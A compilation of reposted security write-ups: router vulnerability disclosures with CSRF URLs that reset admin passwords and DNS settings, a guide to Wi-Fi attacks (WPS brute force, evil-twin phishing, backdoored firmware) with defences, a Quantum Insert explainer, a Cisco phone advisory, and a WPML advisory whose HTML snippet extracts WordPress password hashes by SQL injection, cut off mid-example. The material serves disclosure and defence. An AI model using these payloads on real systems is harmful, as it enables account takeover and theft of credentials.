(http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Huawei Model: HG556a Tested firmwares: V100R001C10B077 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121778 (http://osvdb.org/show/osvdb/121778) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- --------------------------------- Bypass Authentication ---------------------------------- * Description: An external attacker, without requiring any login process, is able to reset the router settings to default ones besides bringing a permanent denial of service attack on. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121779 (http://osvdb.org/show/osvdb/121779) * PoC: Without requiring any login process, an attacker is able to bring on a permanent denial of service by constantly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router by using the default credentials. In both attacks, router asks for username-password and returns HTTP 401 status code (unauthorized), but after multiple requests are sent, it replies with HTTP 400 status code and executes the action. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121775 (http://osvdb.org/show/osvdb/121775) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121776 (http://osvdb.org/show/osvdb/121776) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as diagnostic.htm and config_wifi.htm. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121777 (http://osvdb.org/show/osvdb/121777) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Dispositivos Conectados (Connected Devices) table. Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122385 (http://osvdb.org/show/osvdb/122385) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Astoria Model: ARV7510 Tested firmwares: 00.03.41 Comments: Common router that ISP Vodafone used to give away to their customers -------------------------------------------------------------------------------------------- ---------------------------- USB Device Bypass Authentication ---------------------------- * Description: An external attacker, without requiring any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121773 (http://osvdb.org/show/osvdb/121773) * PoC: If a USB storage device is hooked up to the router, an external attacker is able to download, modify the content and upload new files, without requiring any login process. In order to do so, the attacker only needs to access the router IP followed by the 9000 port. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and OSVDB-121888 (http://osvdb.org/show/osvdb/121888) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1 ============================================================================================ ============================================================================================ Manufacturer: Amper Model: ASL-26555 Tested firmwares: v2.0.0.37B_ES Comments: Common router that Spanish ISP Telefónica used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and OSVDB-121771 (http://osvdb.org/show/osvdb/121771) * PoC: Besides the main web configuration interface (port 80), there is a much more advanced one on port 8000 in which every input field is vulnerable to CSRF. I.e., if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link: http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS It is also possible for an attacker to change the default router administrator password by sending the victim this URL: (URL is omitted due to size reasons) -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121772 (http://osvdb.org/show/osvdb/121772) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The vulnerable input field is found into the basic web interface on port 80. The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory, into the advanced web interface on port 8000. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121224 (http://osvdb.org/show/osvdb/121224) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the Connected Clients table (Setup->Local Network). Once the victim views this list, the script is executed. -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122388 (http://osvdb.org/show/osvdb/122388) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: AR-5387un Tested firmwares: A731-410JAZ-C04_R02 Comments: Common router that ISP Jazztel used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Netgear Model: CG3100D Tested firmwares: v1.05.05 Comments: Common router that ISP ONO used to give away to their customers -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121795 (http://osvdb.org/show/osvdb/121795) * PoC: Every input field is vulnerable to CSRF. An attacker may code a malicious website which triggers a POST request to the victim’s router. When a website with that code is accessed, the POST request is sent and the attack is done. It is also possible for an attacker to reset the victim’s router to default settings by using custom source code. (Source codes have been omitted due to size reasons). -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121780 (http://osvdb.org/show/osvdb/121780) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The script execution can be clearly seen within different subdirectories such as Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del router (Advanced->Router status). ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: VG-8050 Tested firmwares: SB01-S412TLF-C07_R03 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121218 (http://osvdb.org/show/osvdb/121218) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within Wireless->Security and Wireless->MAC Filter subdirectories. -------------------------------------------------------------------------------------------- -------------------------- Unauthenticated Cross Site Scripting -------------------------- * Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code within the router configuration website by sending a DHCP Request PDU. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121215 (http://osvdb.org/show/osvdb/121215) * PoC: An external attacker is able to inject malicious code within the router website without requiring any login process. This is achieved by sending a DHCP Request PDU containing the malicious script within the hostname parameter. The malicious code will be stored within the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed. ============================================================================================ ============================================================================================ Manufacturer: Zyxel Model: P 660HW-B1A Tested firmwares: 3.10L.02 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- ----------------------------- Persistent Cross Site Scripting ---------------------------- * Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121796 (http://osvdb.org/show/osvdb/121796) * PoC: Despite the fact that most of the input fields do not allow special characters to be written in, there are still some of them in which a XSS can be performed. I.e., the Hostname field within the Dynamic DNS subdirectory allows script code injection. -------------------------------------------------------------------------------------------- ------------------------------- Cross Site Request Forgery ------------------------------- * Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password. * Report status: Reported to MITRE on 2015-05-07. Waiting for assignation. OSVDB-121797 (http://osvdb.org/show/osvdb/121797) * PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. I.e., if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link: http://192.168.1.1/password.cgi?sysPassword=newpassword ============================================================================================ ============================================================================================ Manufacturer: Comtrend Model: 536+ Tested firmwares: A101-220TLF-C35 Comments: Common router that Spanish ISP Telefonica used to give away to their customers -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122383 (http://osvdb.org/show/osvdb/122383) * PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ ============================================================================================ Manufacturer: D-Link Model: DIR-600 Tested firmwares: PV6K3A8024009 Comments: -------------------------------------------------------------------------------------------- -------------------------------- Universal Plug and Play --------------------------------- * Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol. * Report status: Reported to MITRE on 2015-05-21. Waiting for assignation. OSVDB-122384 (http://osvdb.org/show/osvdb/122384) * PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has lots of weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or the termination of any WAN connections (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (router needs to be factory reset to work properly again) or open critical ports, even for remote hosts which are not into the LAN. ============================================================================================ We would also like to thank Alejandro Ramos (Project Tutor) and Maite Villalba (Director of Master). Greetings, Jose Antonio Rodriguez Garcia Alvaro Folgado Rueda Ivan Sanz de Castro. Source: http://dl.packetstormsecurity.net/1505-exploits/soho-22vulns.txt
-
While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11\ The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. User has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors. References [1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki [2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm [3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica Source
-
A Quantum Insert Attack is a classic example of man-in-the-middle attacks which resurfaced into news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread a malware which can work in tandem with a botnet C&C server. Understanding the attack The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained by Internet Service Providers and in the case of cyber espionage crimes, having access within a network looking to move laterally inside. This kind of attack is generally not used for large scale attacks, instead the attacker is very well aware of his target and most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better: Step 1: Step 2: Step 3: In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim. The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded. Simulating the attack To simulate the Quantum Insert attack, we would require three VMs: One VM will act as a victim Second VM will be used to monitor the traffic Third will be used to shoot a malicious payload to the victim. The proof-of-concept code for simulation is available to be downloaded here: Download hough the details of use for the script is given in the github page, let me re-iterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows: Victim visits mysite.com We need SYN+ACK of mysite.com On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. Shooter has a dependency on Scapy to craft packets (with its header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition. How real time QI works I. Foot printing Agencies like NSA and GCHQ catch hold of choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed as TURMOIL captures the network dumps and passes it to traffic analysis tools like Xkeyscore which automate the packet analysis. II. Build User Profiles Tools like Xkeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attacks. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years. III. Attack the target Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites. IV. Maintain access and persist Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to gain his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts. Detecting QI attacks QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But, both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values than the real packets because of the closer proximity of the attacker to the victim. Links for QI detection for snort: GitHub Links for QI PCAPS: GitHub References http://blog.fox-it.com Source
-
Some of the IP phones designed by Cisco for small businesses are plagued by a vulnerability that allows a remote attacker to eavesdrop on conversations and make phone calls from affected devices, the company revealed last week. The unauthenticated remote dial vulnerability (CVE-2015-0670) affects version 7.5.5 and possibly later versions of Cisco Small Business SPA300 and SPA500 series IP phones.Cisco IP phones According to an advisory published by Cisco, the flaw is caused by improper authentication settings in the affected software’s default configuration. A remote, unauthenticated attacker can exploit the weakness by sending a maliciously crafted XML request to the targeted IP phone. Malicious actors could obtain sensitive information by listening in on audio streams from the device. They can also leverage the bug to make phone calls remotely from a vulnerable phone. “A successful exploit could be used to conduct further attacks,” Cisco said. “To exploit this vulnerability, an attacker may need access to trusted, internal networks behind a firewall to send crafted XML requests to the targeted device. This access requirement may reduce the likelihood of a successful exploit,” the company noted in its advisory. Cisco has confirmed the security hole, but updates that address this issue are not yet available. The company believes it’s unlikely for this medium severity vulnerability to be exploited. Until security updates become available, administrators are advised to enable XML execution authentication from the device’s settings menu, and limit network access to trusted users. The security hole was discovered by Chris Watts of Tech Analysis. In July 2014, the researcher reported two other flaws impacting Cisco SPA300 and SPA500 series IP phones: a cross-site scripting (XSS) vulnerability (CVE-2014-3313), and a vulnerability that can be exploited by a local attacker to execute arbitrary commands (CVE-2014-3312). At around the same time, Watts also identified a remote code execution flaw in Cisco modems. Earlier this month, Cisco announced the availability of security updates that fix vulnerabilities in Cisco Intrusion Prevention System (IPS), TelePresence Video Communication Server (VCS), Expressway, and TelePresence Conductor. Sursa
-
OVERVIEW ========== WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version 3.1.9.1 released earlier this week to resolve the issues. DETAILS ======== 1. SQL injection When WPML processed a HTTP POST request containing the parameter ”action=wp-link-ajax”, the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend. The following HTML snippet demonstrates the vulnerability: <script> var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users"; if (document.location.search.length < 2) document.location.search="lang=xx' UNION "+union+" -- -- "; </script> <form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed"> <input type=hidden name=action value="wp-link-ajax"> <input type=submit> </form> The results of the SQL query will be shown in the comments feed XML-formatted. 2. Page/post/menu deletion WPML contains a ”menu sync” function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus. Example: <form method=POST 